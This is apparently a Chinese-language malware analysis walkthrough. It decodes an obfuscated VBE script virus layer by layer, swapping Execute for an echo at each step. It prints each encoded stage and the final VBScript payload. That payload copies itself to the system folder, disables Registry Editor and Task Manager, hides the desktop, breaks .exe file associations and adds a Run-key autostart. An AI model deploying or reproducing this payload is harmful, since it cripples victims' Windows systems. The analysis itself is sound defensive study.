脚本病毒-VBE脚本

分析过程

首先拿到这个病毒，通过图表，以及后缀名，可以判断出这是一个vbs的脚本病毒。

病毒图表以及后缀名

于是我们通过文本编辑器打开这个脚本，可以发现是一团乱码，很明显这是被加密过的代码。

#@~^vRUAAA==a{J{~ y&fy%y�&2 3 A of2 Zy9&2 ,y�f&y2y2+Affy2+2y$&2 3+A 2ffy2+2y$2&+; G&&yGy9&2 3 w 3f2 2y3 z&&y3+2y%2&+2+oyvf&y3 w 3f2 Z+92&+%y{2&+A w 22&y3 G o&2 3+A ,2f A Z2f+2ys2&+G+/2&+2yo A&f+A 2+12&+Zy92&+A w f2&y3 A )&2 1+A&&y1 R&&y3+2yA2&+2+oy2f&y� R&f+A 2+12&+2yoy2f2 R v2&y� F&f A o+O&&y3 w 22f+vyv2&+2+3y,f&y$ w&f+; AffyG+Z2fyv++&2 2y2y$&2 3 w )f2 2y3 G&&y3+2y,2&+2+oybf&y3 A of2 2+oyZf&y$y,f2 R s2&y3 w )&2 3+w G2f A sy3f&yGyZf&+3yf+22f A 3+z&&+3y2+,2fy2+w A&&y2yo +&f R �f2 vy{&2 2yo+,2&y2+s+32&+vy�&2 3+A ,ffyZ+A2fyA+A&2 2yZ2f A o&2 {+;&&y3 w 22f+2y2y,f&+/yff&y3 w of2 2+oybf&y3y2+~&2 Ayv2f O 3&2 3+w f2f A 2y)f&yAy,f&+0y2f&y3 w 3f2 2+3y,f&y{yZf2 A 2yf2f A o A&f++ v2f A sy)f&yvy%f&+3ys+G2f R of2 2+3y2f&y3ys+F&2 2ysyo&2 3 w 3f2 2y3 ~&&y$+s2&yA+GffyA+22f A /f2 2+o2&+Gy/2&+A w 22&y3 A 1&2 /+G&&y3 w s2f+2ysybf&+3y2+A2f z of2 ,+32&+2yoyff2 A 2yb2f ~ 1&2 0+A&&y3 w 22f+2y2y,f&+{yZf&y3 A 9f2 2+oy2f&y�yvf2 A syb2f + 0&2 3+w G2f R s2f+2y2y2f&+3ys+G2f A o+w&&+3ys+22fy2+A ~&&yAyo&2 $ +&f+~ 22f A Z2f+2ys2&+G+/2&+2yo A&f+A 2+12&+Zy92&+A A b2&y3 A 3&2 1+A&&y1 R&&y3+2yA2&+2+oy2f&y� R&f+A 2+12&+2yoy2f2 R v2&y� F&f A o+O&&y3 w 22f+vyv2&+2+3y,f&y$ w&f+; AffyG+Z2fyv++&2 2y2y$&2 3 w )f2 2y3 G&&y3+2y,2&+2+oybf&y3 A of2 2+oyZf&y$y,f2 R s2&y3 w )&2 3+w G2f A sy3f&yGyZf&+3yf+22f A 3+z&&+3y2+,2fy2+w A&&y2yo +&f R �f2 vy{&2 2yo+,2&y2+s+32&+vy�&2 3+A ,ffyZ+A2fyA+A&2 2yZ2f A o&2 3+w s2f A sy)f&y2ys+vffyZ+f2f A 3+~&&+3yZf&y3ysf2 F Z2&y3 w 3&2 3+A ,2f ; f2f+2y2yAf&+1y2f&y1 R&f+A 2+$2&+2yoy2f2 + %2&y3 A 1&2 3+w 22f R v2f+vyG2&+2+oy,f&y3 w 3f2 v+�2&+2y3y,f2 ~ s2&y/ ~&f F 0f2 2y3 z&&y�+v2&y2+2+$2&+2yo z&f+A 2+92&+2y3y,f2 ~ ,2&y{ ;&f A o+~&&y3 w 22f+2ysyGf&+3ys+G2f ; $f2 A+32&+2y/2&+A w&&y2y3 z&f A 3+A&&y$ O&&y0+22&y2+s+32&+2y3 O&f+R sffy2+sy)2&+A w G2&y3 w 3&2 $+w&&y{ R&&y{+Z2&yv+vffy2+2y$&2 3+w bffy2+2y92&+A A ,2&y$ O&f F /f2 vy�&2 2y3+A2&y2+s+)2&+2y3 G&f+A 2+12&+%yo2&+A A %2&y3 w {&2 3+w G2f R G2f+vy%2&+2+oyvf&y3 w 3f2 A+32&+Ay12&+O R&&y2y3 A&f A 3+G&&y3 G 22f+Ays2&+2+oysf&y3 w )f2 2+3yAf&y)ysf2 ; G2&y/ ~&f + 9f2 ,y)&2 Gy1f&yAy,f&+3y2+G2f + {f2 2+oy2f&y/yAf2 ~ 22&y3 ;&f A of2 2y3 ~&&y$+,2&yG+fffy2+sy3&2 3+w Zffy2+2y�2&+A A A2&y3 w )&2 3+A ,2f A sy3f&yZyff&+/yAf&y0 G&f+R bffy,+%2fyG+z&2 vyf2f F /&2 3+A 22f A sy9f&y2y2+,ffy2+2y�&2 �+R&&+3y2+A2fy2+w A&&yvy9&2 0 R&f+A sy)&2 vy�f&y2y2+Affy2+2y3&2 3+A bffy2+2y32&+A w f2&y3 A 1&2 �+G&&y{ R&&y3+syb2&+2+3ysf&y3 w of2 2+3y2f&y3y2++&2 2y2y)&2 � G&f+O %2f A 2y0f&y2y2+Affy2+2y$&2 3+w 2ffy2+2yo2&+A A ,2&y{ O&f A o+A&&y3 A A2f+2y2ybf&+3ys+b2f A 3+A&&+3y2+s2fyv+G&2 Gys2f A 3 A&f+A sy{&2 2yo+b2&yv+vffy2+sy)&2 3+w 2ffy2+2y)2&++ G&&yGy/&2 3 G 3f2 2y3 z&&y3+2y,2&+2+oy2f&y3 w �f2 v+92&+,y{2&+A w b2&y3 A )&2 �+R&&y� F&&y3+syG2&+2+oy2f&y{ G&f+A s+32&+2yoyZf2 A syb2f A 3 z&f+A 2y1&2 2y3+A2&y2+f+32&+Gy$&2 3+A 2ffy2+2y32&+A w G2&y3 A )&2 /+~&&y$ ~&&y$+v2&yA+AffyZ+A2f F 9f2 ,+�2&+%y32&++ z&&y,y{&2 { R&f+R v2f F f2f+,yG2&+Z+$2&+2y/&2 3+w&&+3y2+A2fyA+O&2 Gyf2f A o A&f+A sy/&2 2y3+v2&y2+2+$2&+2yo z&f+A 2+12&+2yoy2f2 ; f2&y/ ~&f R 9f2 %y)&2 ,y0f&yGybf&+�yff&y{ ;&f+A 2+32&+2yoyff2 A 2y,2f A 3 +&f++ %2f A 2y$f&y2ys+2ffyv+f2f R 0f2 2+oybf&y�yvf2 A 2yA2f A 3 A&f+A 2y)&2 2y3+22&y2+s+92&+2y3 O&f++ fffyG+%2fy2+w z&&y2y3 w&f A o+w&&y3 A 22f+2y2yvf&+3y2+b2f + 9f2 ,+02&+2y3y%f2 A 2yA2f A 3 ~&f+A sy3&2 2y3+s2&y2+2+12&+Gy1&2 3+w 2ffy2+2y$2&+A A b2&y3 w )&2 3+A 22f A 2yof&yvyff&+{ysf&y3 A 3f2 2+oyGf&y3ys+z&2 vyv2f A o z&f+A sy3&2 2y3+b2&yv+fffyG+Z2f A 9+A&&+3y2+b2fy2+A O&&y2yo A&f A o++&&y� G&&y1+G2&y2+s+)2&+2y3 z&f++ %ffyv+G2fy2+w F&&y2yo A&f F $f2 vy0&2 2y3+b2&y2+s+02&+%y0&2 3+w Zffy2+2y$2&+; ~&&yAy$&2 $ +&f+~ A2f ; A2f+Gyf2&+,+�2&+%y3&2 �+z&&+1yGf&y{y%f2 R v2&y{ G&f O {f2 Zy$&2 2y/f&y2ysf&+3y2+A2f ~ 1f2 G+92&+2yoy2f2 A syZ2f A 3 +&f+A 2y$&2 2yo+b2&y2+2+12&+2yo A&f+; fffyZ+A2fy%+G&2 %yb2f O 0&2 {+z&&y� G&&y{+Z2&y2+2+32&+2yo G&f+A 2+12&+2y3yvf2 + %2&y3 A $&2 3+w 22f + f2f+%y%2&+2+oybf&y� +&f+A 2+$2&+2y3y2f2 A 2yb2f A 3 A&f+A sy9&2 2y3+,2&yv+fffyG+%2f A o+z&&+3y2+s2fy2+w w&&y2y3 A&f A 3++&&y3 A b2f+vyf2&+,+02&+2y3 R&f+A 2+$2&+2y3yAf2 A sy22f A 3 w&f+A 2y1&2 Gy1f&y2ys+2ffy2+2y$&2 3+A bffy2+sy)2&+A A 22&y3 A o&2 �+G&&y{ w&&y3+2y22&+2+oyGf&y3 w )f2 v+�2&+2yoybf2 A sy22f A 3 z&f++ f2f O v2f+2yfysf&+3y2+f2f A o+F&&+3y2+22fy2+A ~&&y2yo A&f A 3+~&&y� G&&y0+G2&y2+2+32&+,y{&2 3+w 2ffy2+2y)2&+A w %2&y3 A 1&2 3+A 22f A 2y9f&yZyAf&+$yAf&y$ +&f+~ AffyZ+A2fyG+G&2 ,yv2f R 3&2 �+z&&y1 F&&y{+%2&y%+vffyG+f2f O {f2 Z+$2&+2y/2&+A w&&y2y3 ~&f ~ 1f2 Gy9&2 2yo+22&y2+s+/2&+2y3 +&f+A 2+$2&+2yoybf2 A 2y,2f A o A&f+; f2f ; A2f+%yf2&+%+)2&+,y0&2 {+G&&+�yff&y3ys+A&2 2yfyo&2 3 w 3f2 2yo G&&y3+syb2&+2+oyGf&y3 w 3f2 v+92&+2y3ybf2 A syA2f A o A&f+A sy{&2 2yo+G2&yv+fffy2+2y3&2 3+A fffy2+sy32&+A A s2&y� G&f + �f2 2y3 A&&y3+syv2&+2+oyvf&y� R&f+A 2+o2&+2yoysf2 ; A2&y$ ~&f ; $f2 Ay{&2 Zy$f&yAyAf&+/yAf&y{ G&f+O vffy%+22fyv+z&2 GyZ2f + o&2 /+~&&y3 ;&&y3+s2&y2+2+$2&+Ay1&2 {+G&&+3ys+22fy2+w ;&&y2y3 +&f A 3+~&&y3 w b2f+2y2y,f&+3ys+22f ; 9f2 Z+$2&+%y92&+R z&&y%y1&2 0 R&f++ f2f F Z2f+2y2y2f&+3ys+f2f A 3+O&&+3y2+v2fyv+R&2 2y2y$&2 3 w 3f2 vy9&2 %y0f&y2ys+bffyv+v2f A 3+~&&+3y2+22fy2+A z&&y2y3 A&f A o+G&&y3 A ,2f+vyf2&+G+02&+2yo z&f+A 2+o2&+2yoysf2 A 2y22f A 3 +&f+A 2y)&2 vy9f&y,y%f&+3y2+%2f A 3+~&&+3y2+A2fy2+w A&&y2y3 w&f A 3+O&&y{ O&&y3+sy22&+2+3yAf&y3 A )f2 2+oybf&y3y2+A&2 2y2yo&2 � G&f+F f2f A 2y0f&y2y2+sffyv+f2f R 9f2 2+oy2f&y3ys+F&2 2ysy{&2 3 A 3f2 ,y)&2 Gy1f&yZyAf&+$yAf&y/ ~&f+O bffyG+,2fyA+O&2 2y2y{&2 � F&f+A sy3&2 Zy$f&y2yZf&+3ysff8+Fl XXy  */+s{&F�+AfF*~&vy*l1GZv9&2G){AGZF{&2*!2f{vFF2&X +XlF+ lq&OG/{Fvff{l!fvyXlF{zvFvAy*F)vFG)G;v)�~Gb2f*8J)wG.Pb'8POW~J�xc6*~?D+2~y)/xdLZ4Dv/dxLvJLCJLHb[`X~r~y#b~oWD,fF*)1�aO)A6�m;Yn~"+2Vm^+v/SEBJ~E~r#YsMEAA==^#~@ ```

然后，使用vbs解密工具解密，有个在线工具：
>  http://www.sanxiang.org/jscript-decode.html 

解密之后：

x="7B223D2826332E2E2F332C2D332926332E2E2B332E2E2B332E2E2E332E2E2B332C2D33272D332E2F2E332E2E2A332E2E28332E2F26332E2F2E332C2D332827332E2F2E332E2D2F332E2E29332E2C332E2F33272C332E2F2E332E2E29332C2D332E2F2D332E2E2A33292E332928332E2E2B332E2F2E332628332E2E29332E2F2E332826332627332E2F29332E2F2E332626332E2E29332B2F332C2B33272C332626332E2E2B332E2F2A332E2E2D332E2E29332E2F2A332E2E2F332E2F2C332B2933282F332E2F2A332E2F27332E2F2E33272C332E2D2E332E2E2A332E2E29332E2F2E332E2F26332826332627332E2F29332E2F2E332626332E2E29332C2B332B2E332E2C332E2F33272C332E2F2E332E2E29332C2D332E2F2F332E2F2A332E2E2B332B2633292E332E2F2D332E2E2A332B2933282E332E2F2E332E2E2933272C332E2E2D332E2F2E332626332E2F2A332628332E2F2733282F332E2E2E332E2F27332E2F2F332E2F2E332E2E2B332B2F332B27332B2E332E2C332E2F33272C332E2F2E332E2E29332C2D332E2F2F332E2F2A332E2E2B332A2F33292E332E2F2D332E2E2A332B2933282E332E2F2E332E2E2933272C332E2E2D332E2F2E332626332E2F2A332628332E2F2733282F332E2E2E332E2F27332E2F2F332E2F2E332E2E2B332B2F332B26332B2E332E2C332E2F33272C332E2F2E332E2E29332C2D332E2E2A332E2E2E33292E332928332E2E2B332E2F2E332628332E2E29332E2F2E332826332627332E2F29332E2F2E332626332E2E29332B2F332C2B33272C332626332E2E2B332E2F2A332E2E2D332E2E29332E2F2A332E2E2F332E2F2C332B2933282F332E2F2A332E2F27332E2F2E33272C332E2D2E332E2E2A332E2E29332E2F2E332E2F26332826332627332E2F29332E2F2E332626332E2E29332C2B332B2E332E2C332E2F332E2F2F332E2F2A332E2F26332C2D332E2E2B332E2C332E2F33272C332E2F2E332E2E29332C2D332E2E2B33292E332928332E2E2B332E2F2E332628332E2E29332E2F2E332826332627332E2F29332E2F2E332626332E2E29332B2F332C2B332728332E2E2A332626332E2E2B332E2F2A332E2E2D332E2E29332B2933272C332E2F2B332E2F2E332E2F27332E2F27332C2B332B2E332E2C332E2F332E2E2A332E2E2E332B2933282E332E2F2E332E2E2933282F332E2F2A332E2F27332E2F2E332B2F33272833272C332626332E2E2B332E2F2A332E2E2D332E2E29332B2933272C332626332E2E2B332E2F2A332E2E2D332E2E2933282F332E2E28332E2F27332E2F27332827332628332E2F26332E2F2E332B2E332B29332928332E2E2E332E2E2D332E2D2E332B2F332E2F2F332E2F2A332E2E2B332A2F332C27332C2B33262D33292A332729332B29332E2E27332627332E2F2E332C2B332B2E332E2C332E2F332E2E2B332B2933272D332E2F2E332E2F2C332E2E26332E2E2B332E2F2A332E2E29332E2F2E332C2D332C2B33282D33282A33292833272A33262D33272C332E2E2E332E2F2D332E2E29332E2E26332628332E2E2B332E2F2E33262D332828332E2F2A332626332E2E2B332E2E2E332E2E2A332E2E2E332E2F2D332E2E2933262D332728332E2F2A332E2E2F332E2F2F332E2E2E332E2E26332E2E2A33262D332928332E2E28332E2E2B332E2E2B332E2F2E332E2E2F332E2E29332729332E2F2E332E2E2B332E2E2A332E2F2A332E2E2E332E2E2F33262D33272F332E2E2E332E2F27332E2F2A332626332E2F2A332E2F2E332E2E2A33262D33272C332E2D2E332E2E2A332E2E29332E2F2E332E2F2633262D332927332E2F2A332E2E2A332628332627332E2F27332E2F2E33272D332E2F2E332E2F2C332E2F2A332E2E2A332E2E29332E2E2B332E2D2E33272B332E2E2E332E2E2E332E2F27332E2E2A332C2B332B2B332B26332B2B332C2B33272D33292633282E33262A33292733272833282633272D332927332C2B332E2C332E2F332E2E2B332B2933272D332E2F2E332E2F2C332E2E26332E2E2B332E2F2A332E2E29332E2F2E332C2D332C2B33282D33282A33292833272A33262D33272C332E2E2E332E2F2D332E2E29332E2E26332628332E2E2B332E2F2E33262D332828332E2F2A332626332E2E2B332E2E2E332E2E2A332E2E2E332E2F2D332E2E2933262D332728332E2F2A332E2E2F332E2F2F332E2E2E332E2E26332E2E2A33262D332928332E2E28332E2E2B332E2E2B332E2F2E332E2E2F332E2E29332729332E2F2E332E2E2B332E2E2A332E2F2A332E2E2E332E2E2F33262D33272F332E2E2E332E2F27332E2F2A332626332E2F2A332E2F2E332E2E2A33262D33272C332E2D2E332E2E2A332E2E29332E2F2E332E2F2633262D332927332E2F2A332E2E2A332628332627332E2F27332E2F2E33272B332628332E2E2A332E2F28332828332E2F2C332E2E2B332C2B332B2B332B26332B2B332C2B33272D33292633282E33262A33292733272833282633272D332927332C2B332E2C332E2F332E2E2B332B2933272D332E2F2E332E2F2C332E2E26332E2E2B332E2F2A332E2E29332E2F2E332C2D332C2B33282D33282A33292833272A33262D33272C332E2E2E332E2F2D332E2E29332E2E26332628332E2E2B332E2F2E33262D332828332E2F2A332626332E2E2B332E2E2E332E2E2A332E2E2E332E2F2D332E2E2933262D332728332E2F2A332E2E2F332E2F2F332E2E2E332E2E26332E2E2A33262D332928332E2E28332E2E2B332E2E2B332E2F2E332E2E2F332E2E29332729332E2F2E332E2E2B332E2E2A332E2F2A332E2E2E332E2E2F33262D33272F332E2E2E332E2F27332E2F2A332626332E2F2A332E2F2E332E2E2A33262D332926332E2D2F332E2E2D332E2F27332E2E2E332E2E2B332E2F2E332E2E2B33262D332827332E2E2E332927332E2F2E332E2E2A332E2F28332E2E29332E2E2E332E2E2D332C2B332B2B332B26332B2B332C2B33272D33292633282E33262A33292733272833282633272D332927332C2B332E2C332E2F332E2E2B332B2933272D332E2F2E332E2F2C332E2E26332E2E2B332E2F2A332E2E29332E2F2E332C2D332C2B33282D33282A33292833272D33262D332E2F2E332E2D2F332E2F2E332E2F2D332E2F2A332E2F27332E2F2E33262D332E2E2A332E2F2B332E2F2E332E2F27332E2F2733262D332E2E2E332E2E2D332E2F2E332E2E2F33262D332626332E2E2E332E2F26332E2F26332628332E2E2F332E2F2F332C2B332B2B332C2B332B27332C2B332B2B332C2B33272D33292633282E33262A33272C33262F332C2B332E2C332E2F332E2E2B332B2933272D332E2F2E332E2F2C332E2E26332E2E2B332E2F2A332E2E29332E2F2E332C2D332C2B33282D33282A33282933282833262D33272C332E2E2E332E2F2D332E2E29332E2E26332628332E2E2B332E2F2E33262D332828332E2F2A332626332E2E2B332E2E2E332E2E2A332E2E2E332E2F2D332E2E2933262D332728332E2F2A332E2E2F332E2F2F332E2E2E332E2E26332E2E2A33262D332928332E2E28332E2E2B332E2E2B332E2F2E332E2E2F332E2E29332729332E2F2E332E2E2B332E2E2A332E2F2A332E2E2E332E2E2F33262D33272D332E2E28332E2E2F33262D33282D332E2F2E332E2F27332E2F27332E2E2E33292A332729332C2B332B2B332C2B33292A332729332B29332E2E27332627332E2F2E332C2B332E2C332E2F3D12152552224C6F73766B375B362559706D337A7E7C773350337671335225512251397C776D37503625517A676B257A677A7C6A6B7A3351":For i=1 to Len(x) Step 2:s=s&Chr(CLng("&H"&Mid(x,i,2)) Xor 31):Next:Execute Replace(s,","," ") ```

这里我们对于这个病毒的大体面貌有了一个比较简单的认识：

• x变量是一个非常长的字符串；
• 然后进入for循环，从x中每次取两个字符进行一些操作；
• 之后用空格替换掉一些逗号之后，执行代码。

在这里我们可以将Execute这个函数替换成输出命令，同时利用重定向命令，将本来应该执行的内容写入到文件中。

在命令行中执行命令：

cscript AV1.vbe的目录 >>AV2.vbe的目录

通过重定向生成AV2.vbe

这时，我们得到了经过了初步解码的代码AV2.vbe,继续按照文本格式打开，看看里面是什么内容：

Microsoft (R) Windows Script Host Version 5.8
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

d="79 110 32 69 114 114 111 114 32 82 101 115 117 109 101 32 78 101 120 116 13 10 83 101 116 32 102 115 61 67 114 101 97 116 101 79 98 106 101 99 116 40 34 83 99 114 105 112 116 105 110 103 46 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 34 41 13 10 83 101 116 32 100 105 114 49 61 102 115 46 71 101 116 83 112 101 99 105 97 108 70 111 108 100 101 114 40 48 41 13 10 83 101 116 32 100 105 114 50 61 102 115 46 71 101 116 83 112 101 99 105 97 108 70 111 108 100 101 114 40 49 41 13 10 83 101 116 32 115 111 61 67 114 101 97 116 101 79 98 106 101 99 116 40 34 83 99 114 105 112 116 105 110 103 46 70 105 108 101 83 121 115 116 101 109 79 98 106 101 99 116 34 41 13 10 100 105 109 32 114 13 10 83 101 116 32 114 61 67 114 101 97 116 101 79 98 106 101 99 116 40 34 87 115 99 114 105 112 116 46 83 104 101 108 108 34 41 13 10 115 111 46 71 101 116 70 105 108 101 40 87 83 99 114 105 112 116 46 83 99 114 105 112 116 70 117 108 108 78 97 109 101 41 46 67 111 112 121 40 100 105 114 50 38 34 92 65 86 46 118 98 101 34 41 13 10 114 46 82 101 103 119 114 105 116 101 32 34 72 75 67 85 92 83 111 102 116 119 97 114 101 92 77 105 99 114 111 115 111 102 116 92 87 105 110 100 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 92 80 111 108 105 99 105 101 115 92 83 121 115 116 101 109 92 68 105 115 97 98 108 101 82 101 103 105 115 116 114 121 84 111 111 108 115 34 44 49 44 34 82 69 71 95 68 87 79 82 68 34 13 10 114 46 82 101 103 119 114 105 116 101 32 34 72 75 67 85 92 83 111 102 116 119 97 114 101 92 77 105 99 114 111 115 111 102 116 92 87 105 110 100 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 92 80 111 108 105 99 105 101 115 92 83 121 115 116 101 109 92 68 105 115 97 98 108 101 84 97 115 107 77 103 114 34 44 49 44 34 82 69 71 95 68 87 79 82 68 34 13 10 114 46 82 101 103 119 114 105 116 101 32 34 72 75 67 85 92 83 111 102 116 119 97 114 101 92 77 105 99 114 111 115 111 102 116 92 87 105 110 100 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 92 80 111 108 105 99 105 101 115 92 69 120 112 108 111 114 101 114 92 78 111 68 101 115 107 116 111 112 34 44 49 44 34 82 69 71 95 68 87 79 82 68 34 13 10 114 46 82 101 103 119 114 105 116 101 32 34 72 75 67 82 92 101 120 101 102 105 108 101 92 115 104 101 108 108 92 111 112 101 110 92 99 111 109 109 97 110 100 34 44 34 48 34 44 34 82 69 71 95 83 90 34 13 10 114 46 82 101 103 119 114 105 116 101 32 34 72 75 76 77 92 83 111 102 116 119 97 114 101 92 77 105 99 114 111 115 111 102 116 92 87 105 110 100 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 92 82 117 110 92 72 101 108 108 111 65 86 34 44 34 65 86 46 118 98 101 34 13 10"
:M=Split(D):For each O in M:N=N&chr(O):Next:execute N

前面两行是我们重定向操作导致的一些无用字符，删除即可。
对于剩下的内容，我们如法炮制，也不管它的解析过程，直接将文本最后的执行函数改为输出函数:

:M=Split(D):For each O in M:N=N&chr(O):Next:wscript.echo N

AV2.vbe修改过后的内容

修改过后记得保存，再次在命令行中执行相似的命令：

通过重定向生成AV3.vbe

然后再把AV3.vbe按照文本格式打开,去除多余内容，剩下的就是原本的代码：

On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\AV.vbe")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
r.Regwrite "HKCR\exefile\shell\open\command","0","REG_SZ"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HelloAV","AV.vbe"

主要的功能我们通过函数名也有一个大体的了解
创建文件系统对象，然后打开进程，然后开始修改注册表，运行自身，更加深入和细致的了解，我们可以在创建过快照的虚拟机中进行观察。

反思与总结

对于看不懂的字符，可以通过大体的特征先判断是通过哪种加密方法加密，然后借助互联网的力量进行解密操作。

对于一些脚本语言，不一定要了解深入，有时候通过简单的函数替换就可以起到非常好的效果